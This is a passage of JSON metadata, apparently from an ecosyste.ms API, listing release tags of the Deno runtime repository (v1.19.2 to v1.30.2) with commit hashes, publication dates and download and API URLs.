ifests"},{"name":"v1.30.2","sha":"cee13304ffe58286fcfab3526c46f95a7e23825d","kind":"commit","published_at":"2023-02-03T14:46:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.2/manifests"},{"name":"v1.30.1","sha":"000fb83c587a17118d83b990f1d08c98bb9cce2a","kind":"commit","published_at":"2023-02-02T14:26:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.1/manifests"},{"name":"v1.30.0","sha":"a6f915c22f34921780b4bcb8b6da8cd3bd20d5a8","kind":"commit","published_at":"2023-01-25T23:15:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.0/manifests"},{"name":"v1.29.4","sha":"65db94feba9d4d51a09b74629f566dbc90484fba","kind":"commit","published_at":"2023-01-16T22:07:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.4/manifests"},{"name":"v1.29.3","sha":"9806dcc91496ab12c7fba238d411e23c22e2a302","kind":"commit","published_at":"2023-01-13T17:17:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.3/manifests"},{"name":"v1.29.2","sha":"14c4c8f9340235bd1ddb5388558c984beb0bb6d9","kind":"commit","published_at":"2023-01-05T13:37:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.2/manifests"},{"name":"v1.29.1","sha":"145013ab7fb00c7293ce33806f26dc4083a8da66","kind":"commit","published_at":"2022-12-15T16:32:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.1/manifests"},{"name":"v1.29.0","sha":"0d4e4af7acf82c1365999a7281910daa05f0e982","kind":"commit","published_at":"2022-12-14T23:22:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.0/manifests"},{"name":"v1.28.3","sha":"74064c9d8c222b33b2a552ea0af1054f57002a96","kind":"commit","published_at":"2022-12-01T10:10:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.3/manifests"},{"name":"v1.28.2","sha":"1aca16e23998ee54f6a15217cd4cc6b8b13299b7","kind":"commit","published_at":"2022-11-24T20:22:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.2/manifests"},{"name":"v1.28.1","sha":"2743d42099cb0596f03c7d1252e5cfbb53f7a9ec","kind":"commit","published_at":"2022-11-16T23:35:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.1/manifests"},{"name":"v1.28.0","sha":"916598f8a77d1fb7b7feb577e600ead2bc45045f","kind":"commit","published_at":"2022-11-13T20:31:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.0/manifests"},{"name":"v1.27.2","sha":"5cd5cfa8d655e8a71441cf9736df93efde75153c","kind":"commit","published_at":"2022-11-08T21:42:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.2/manifests"},{"name":"v1.27.1","sha":"d448c2950db2ed474405ace6a0a180301eeaa68d","kind":"commit","published_at":"2022-11-03T21:52:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.1/manifests"},{"name":"v1.27.0","sha":"b0fb8fa9dc08640e77eb0ab888a483db18a52a4b","kind":"commit","published_at":"2022-10-27T15:13:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.0/manifests"},{"name":"v1.26.2","sha":"d1f432bf12e5de645d45f1f2738a53981f39fa5b","kind":"commit","published_at":"2022-10-17T18:51:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.2/manifests"},{"name":"v1.26.1","sha":"753b60dd9b0c9bb5220609f2fe65ad06957690d6","kind":"commit","published_at":"2022-10-06T17:16:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.1/manifests"},{"name":"v1.26.0","sha":"d8827514ffef04c2e1732f7033ff6a374dd94d54","kind":"commit","published_at":"2022-09-28T22:10:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.0/manifests"},{"name":"v1.25.4","sha":"02afbe2af550ad5223d982e8fdd37f778b9d828c","kind":"commit","published_at":"2022-09-22T18:01:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.4/manifests"},{"name":"v1.25.3","sha":"f561e765a75c749f1d1e2d6584edf6018435e6e1","kind":"commit","published_at":"2022-09-15T17:46:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.3/manifests"},{"name":"v1.25.2","sha":"3c5af2ba495b2d5770b3f5ed12e202ba2089ebda","kind":"commit","published_at":"2022-09-09T08:54:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.2/manifests"},{"name":"v1.25.1","sha":"1e78804d5c0b8204978dd77431ac33d8d16ce5bc","kind":"commit","published_at":"2022-09-02T00:07:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.1/manifests"},{"name":"v1.25.0","sha":"8986e2ced4adbf6185aea02a580036aa92c2872c","kind":"commit","published_at":"2022-08-24T22:20:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.0/manifests"},{"name":"v1.24.3","sha":"c79127061438234a60f63cf9d0a276328961f971","kind":"commit","published_at":"2022-08-11T18:38:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.3/manifests"},{"name":"v1.24.2","sha":"44ade24fb213875814c431c87abb3f79ecab1fef","kind":"commit","published_at":"2022-08-04T20:49:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.2/manifests"},{"name":"v1.24.1","sha":"fa9698fe9ec3ceb660c1865eb75f07a0bc5b90c5","kind":"commit","published_at":"2022-07-28T17:22:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.1/manifests"},{"name":"v1.24.0","sha":"f0e01682cce638303e3b6997788667a0f71dff8d","kind":"commit","published_at":"2022-07-20T23:28:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.0/manifests"},{"name":"v1.23.4","sha":"b0de3031dcfe6eab1156a2546b996005d1c07cfe","kind":"commit","published_at":"2022-07-12T18:55:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.4/manifests"},{"name":"v1.23.3","sha":"0b07d1a40318147ec0782af9fe99048d5ef80984","kind":"commit","published_at":"2022-07-05T17:00:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.3/manifests"},{"name":"v1.23.2","sha":"5a5d3084ab0f20c511a70a1f2e12ef7bdd184ec2","kind":"commit","published_at":"2022-06-30T19:31:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.2/manifests"},{"name":"v1.23.1","sha":"9f9941c03b942469fb651477503f8cd19f18a1ab","kind":"commit","published_at":"2022-06-23T19:50:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.1/manifests"},{"name":"v1.23.0","sha":"e7ea4edc8a1a4fc339ac2267d9512a9374bc2ce5","kind":"commit","published_at":"2022-06-15T23:02:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.0/manifests"},{"name":"v1.22.3","sha":"43e7c5d328a5a17a8c33362caf642d6ded49f179","kind":"commit","published_at":"2022-06-09T18:55:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.3/manifests"},{"name":"v1.22.2","sha":"783f7661ef74a56dcc8a3a382adc8cf559ec75e5","kind":"commit","published_at":"2022-06-02T17:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.2/manifests"},{"name":"v1.22.1","sha":"6a7151539737e4abe1b12095c9e1bc3ed9376f48","kind":"commit","published_at":"2022-05-27T04:46:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.1/manifests"},{"name":"v1.22.0","sha":"5ad8919d642b646caa3328930dd1a3f290bc587e","kind":"commit","published_at":"2022-05-18T15:05:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.0/manifests"},{"name":"v1.21.3","sha":"d14b77b58e3598ea28712473ea832e22070940ca","kind":"commit","published_at":"2022-05-12T14:14:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.3/manifests"},{"name":"v1.21.2","sha":"2256c697aedc2d2d2d856a4faa0816521a02692a","kind":"commit","published_at":"2022-05-05T20:56:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.2/manifests"},{"name":"v1.21.1","sha":"58bedd8d8422cf0ef6f9a581b188055a74cd9304","kind":"commit","published_at":"2022-04-28T20:33:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.1/manifests"},{"name":"v1.21.0","sha":"29c8cd8aae52b89075e6af84ddd34f813fa3ea8d","kind":"commit","published_at":"2022-04-21T01:50:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.0/manifests"},{"name":"v1.20.6","sha":"3ad1535e48505af3129c133408b496fa8eb7569c","kind":"commit","published_at":"2022-04-14T18:56:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.6/manifests"},{"name":"v1.20.5","sha":"d2c09408380191721ba7dfd971f802f5639eb1f7","kind":"commit","published_at":"2022-04-07T16:38:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.5/manifests"},{"name":"v1.20.4","sha":"a78f728a10bd2c0c3d61f91518dcb053ac53b13b","kind":"commit","published_at":"2022-03-31T17:09:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.4/manifests"},{"name":"v1.20.3","sha":"347da0d1174a685ad1a9445cc8c681677115731f","kind":"commit","published_at":"2022-03-25T15:22:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.3/manifests"},{"name":"v1.20.2","sha":"1be60627d857d788061204eaf7ed6667f7bf0eee","kind":"commit","published_at":"2022-03-24T02:39:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.2/manifests"},{"name":"v1.20.1","sha":"fce60f2cc20bda8403fc7577c086759744314561","kind":"commit","published_at":"2022-03-17T01:40:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.1/manifests"},{"name":"v1.20.0","sha":"418c1eb4b3d65a9573030a074170a344723608de","kind":"commit","published_at":"2022-03-16T20:07:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.0/manifests"},{"name":"v1.19.3","sha":"d6877e941cf270964015b86abae70b34febbef56","kind":"commit","published_at":"2022-03-10T11:22:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.3/manifests"},{"name":"v1.19.2","sha":"84f9a2550369e3f5132ab2ab9f274f76f7db3a90","kind":"commit","published_at":"2022-03-03T16: